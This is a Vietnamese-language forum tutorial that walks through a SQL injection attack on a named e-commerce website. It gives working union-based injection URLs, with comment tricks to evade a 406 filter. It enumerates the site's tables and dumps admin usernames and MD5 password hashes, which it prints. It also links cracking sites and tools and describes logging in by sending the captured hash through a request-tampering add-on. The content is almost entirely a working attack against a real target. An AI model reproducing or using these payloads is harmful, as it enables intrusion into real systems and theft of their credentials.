Hôm nay mình sẽ làm 1 tut khai thác qua lỗi SQL injection...và có 1 số trường hợp sau khi các bạn get được username và password của trang admin cp thì lại ko thể decode được mã MD5 để Login vào nó...cho nên Tut này mình kết hợp khai thác và gợi ý 1 cách để không cần decode mã MD5 get được cũng có thể đăng nhập vào được trang Admin cp.
....cách này mình vô tình tìm thấy trên trang blog của VHB Group....cảm ơn các tiền bối trong VHB group đã thông cho em...^^
Trong bài tut này mình có tham khảo qua cách trình bày của 2 bài TUT trên diễn đàn VHB về khai thác lỗi SQL để làm tut 1 cách dễ hiểu cho các bạn tham khảo
ok..Victim là đây:
http://www.laptopus.vn/?frame=product_detail&id=810
check lỗi nhé.
thêm dấu ' vào cuối id..thấy site thay đổi..vậy là dính lỗi nhé.
bây giờ chúng ta get đến các trường cột của site
http://www.laptopus.vn/?frame=product_detail&id=810 group by 1-- - : site bt nhé
http://www.laptopus.vn/?frame=product_detail&id=810 group by 2-- - : site bình thường
.......
http://www.laptopus.vn/?frame=product_detail&id=810 group by 20-- - : site bình thường
http://www.laptopus.vn/?frame=product_detail&id=810 group by 21-- - : giao diện website thay đổi ==> lỗi rồi nhé
Số trường cột cần tìm là 20
Tiếp theo là tìm những trường cột được coder nó show ra:
http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -
các bạn thấy mình thêm dấu - trước ID... mục đích để làm xuất hiện các con số trường cột được show ra...và mình kẹp cái /*!SELECT*/...mục đích là để bypass lỗi 406 Not Acceptable
chúng ta thấy có xuất hiện số 3,7,19,20 đó là những chỗ bị show ra mà chúng ta có thể khai thác..ở đây mình sẽ khai thác tại vị trí số 3 nhé.
Bây giờ mình sẽ làm xuất hiện tên các Table trong database của website nhé:
http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!table_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
bước này các bạn cũng nhớ để dấu /*! */ bên ngoài các từ khóa như table_name hay tabe_schema nha ....dùng để bypass lỗi 406 Not Acceptable đó mà
OK các table chúng ta thu được là :
tbl_access,tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,
tbl_product,tbl_product_category,tbl_product_home,tbl_product_pro,tbl_product_sell,tbl_product_special,tbl_user,tbl_visitor
Đến đây các bạn có thể để ý thấy có 2 bảng chúng ta có thể nghi ngờ đang lưu passwd của admin đó là bảng:
tbl_member && tbl_user.
chúng ta sẽ thử từng bảng 1 là xong.Ok....mình thử bảng tbl_user nhé ^^ (mình thử gùi nên biết cái này lưu passwd của admin nè..^^)
bây giờ chúng ta xuất ra tên các colums chứa username và password
http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where /*!table_schema*/=database() and /*!table_name*/=0x74626c5f75736572-- -
Lưu ý 1 chút xíu nhé
0x tạm hiểu là dùng để nhận dạng khi sử dụng ở dạng mã hex
74626c5f75736572 là ký tự admin ở dạng hex.
Link convert các ký tự sang mã hex:
http://string-functions.com/string-hex.aspx
Thông tin các columns trong tables tbl_user thu được: id,uid,pwd
Xuất ra thông tin của Username và Password:
http://www.laptopus.vn/?frame=product_detail&id=-810 UNION /*!SELECT*/ 1,2,unhex(hex(group_concat(uid,0x2f,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tbl_user-- -
Thông tin về username và password được mã hóa md5 thu được:
admin/e5965b7b6376fd76e1bcf020cd5c277e,phamvan/544763b9890433d487eab5915070bfb3
Crack Password và tìm link admin:
- Có nhiều site để crack passwd, ví dụ:
http://md5cracker.org/
Hoặc sử dụng google để tìm kiếm
- Sử dụng các tool để tìm link admin: Havij, Web admin finder
Havij 1.5 free: http://www.mediafire.com/?bcrs460vcu1vy2q
Web admin finder 2.5 : http://www.mediafire.com/?ogoclxe83no1xzg
Pass dải nén: ducdung.08clc
Ok..đến đây là bước quan trong đây!!!
Cách login khi không decode đc md5 đối với 1 số site
Đối với website này..admin đã mã hoá MD5 trước khi post dữ liệu lên server.
và bạn không thể decode được mã MD5 này...
Vậy làm sao đây khi có username và passwd mà không thể đăng nhập được vào trang Admincp
Đến đây chúng ta có thể dùng cách sau : (mình có post video hướng dẫn bên dưới):
+ Bật tamper lên (đây là addon của firfox)
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)
Video hướng dẫn:
http://www.youtube.com/watch?feature=player_embedded&v=A2A3OTOVXvQ
